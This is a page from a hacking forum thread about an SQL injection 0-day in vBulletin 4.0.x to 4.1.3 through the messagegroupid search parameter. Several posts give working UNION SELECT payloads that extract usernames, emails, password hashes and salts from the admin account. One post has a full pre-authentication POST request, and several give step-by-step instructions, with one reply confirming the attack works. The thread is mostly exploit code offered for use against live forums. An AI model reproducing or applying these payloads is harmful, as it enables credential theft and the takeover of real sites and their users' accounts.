Page 2 of 4 FirstFirst 1234 LastLast
Results 11 to 20 of 36

Thread: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day Share/Save - My123World.Com!

  1. #11
    Not working.

    used the following term in live http headers:=-
    Code:
    query=Hi+there%2C+any+updates+yet&titleonly=0&searchuser=&starteronly=1&dosearch=Search+Now&messagegroupid%5B%5D=32&searchdate=0&beforeafter=after&sortby=dateline&order=descending&showposts=0&saveprefs=1&s=&securitytoken=1311260620-ba7281604a43c53db361e6069a46b4d9dcc14a18&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
    But got this:-
    Code:
    vBulletin Message:-
    Sorry - no matches. Please try some different terms.

  2. #12
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    I didn't really wanted to put a Step by Step exploiting tutorial. Well ya bug is kind of tricky to exploit. You need to do a little ground works to get it done. May be by tomm I will put better description of the vulnerability.

    @eugenius I found success only via post Authentication

    Quick Points though:

    1)The forum must be having Groups and Discussion.
    http://www.garage4hackers.com/group.php

    2) You should note down a group id and a Discussion message .

    http://www.garage4hackers.com/group.php?groupid=16

    3)Now Search by Group Message: http://www.garage4hackers.com/search.php and Search keyword the Valid Discussion message now add this extra post field and it would be woot woot.

    &messagegroupid[0]=groupid]) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
    Hacking Is a Matter of Time Knowledge and Patience

  3. #13
    Quote Originally Posted by fb1h2s View Post
    I didn't really wanted to put a Step by Step exploiting tutorial. Well ya bug is kind of tricky to exploit. You need to do a little ground works to get it done. May be by tomm I will put better description of the vulnerability.

    @eugenius I found success only via post Authentication

    Quick Points though:

    1)The forum must be having Groups and Discussion.
    http://www.garage4hackers.com/group.php

    2) You should note down a group id and a Discussion message .

    http://www.garage4hackers.com/group.php?groupid=16

    3)Now Search by Group Message: http://www.garage4hackers.com/search.php and Search keyword the Valid Discussion message now add this extra post field and it would be woot woot.

    &messagegroupid[0]=groupid]) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
    Confirmed working.

  4. #14
    still little confused, can some-one post a example search?

  5. #15
    For pre auth try this. I don't have a request for the post auth one. I copied this from the site i posted erlier.

    POST /search.php?do=process HTTP/1.1
    Host: 127.0.0.1
    Content-Type: application/x-www-form-urlencoded
    humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=p rocess&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

  6. #16
    it just seems to do a regular search

    wtf is happening?

  7. #17
    Hi!
    Here's what I get, but there must be an error.

    1 - Once you find out the target forum has groups, go to groups.php, take a group ID.
    2 - Open the group, find a discussion, click it and copy a message.
    3 - Go to search.php and click "Search Single Content Type", selecting "Group Messages" as for "Search Type", then paste the copied discussion message in "Keyword(s):". Add to that field ("Keyword(s)") a string like

    &messagegroupid[0]=YOUR_GROUP_ID]) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

    and press Enter.

    This does not work, and follows your instructions.
    Can someone correct it?

  8. #18
    Quote Originally Posted by manucuvia View Post
    Hi!
    Here's what I get, but there must be an error.
    Error
    http://i005.radikal.ru/1107/88/96c46c38b331.png

  9. #19
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    @vkbugs messagegroupid[0]= valid group id, the group id from of the group from where you have the text "testingtesting".

    Remember its a Union attack so u need to make search to get a valid output.
    Hacking Is a Matter of Time Knowledge and Patience

  10. #20

    Thumbs up

    Quote Originally Posted by fb1h2s View Post
    @vkbugs messagegroupid[0]= valid group id
    Thanks.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •